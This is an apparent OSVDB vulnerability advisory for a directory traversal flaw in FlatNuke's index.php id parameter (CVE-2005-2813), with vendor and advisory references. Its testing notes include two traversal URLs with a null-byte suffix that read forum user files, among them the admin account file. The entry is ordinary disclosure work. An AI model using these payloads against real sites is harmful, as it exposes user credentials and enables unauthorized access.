FlatNuke index.php id Variable Traversal Arbitrary File Access

2005-08-30T10:35:31
ID OSVDB:19118
Type osvdb
Reporter OSVDB
Modified 2005-08-30T10:35:31

Description

Manual Testing Notes

http://[target]/[path]/index.php?mod=read&id=../forum/users/admin.php%00

http://[target]/[path]/index.php?mod=read&id=../forum/users/[user].php%00

References:

Vendor URL: http://flatnuke.sourceforge.net/flatnuke/ Security Tracker: 1014824 Secunia Advisory ID:16650 Related OSVDB ID: 19115 Related OSVDB ID: 19116 Related OSVDB ID: 19117 Related OSVDB ID: 19114 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0442.html CVE-2005-2813 Bugtraq ID: 14702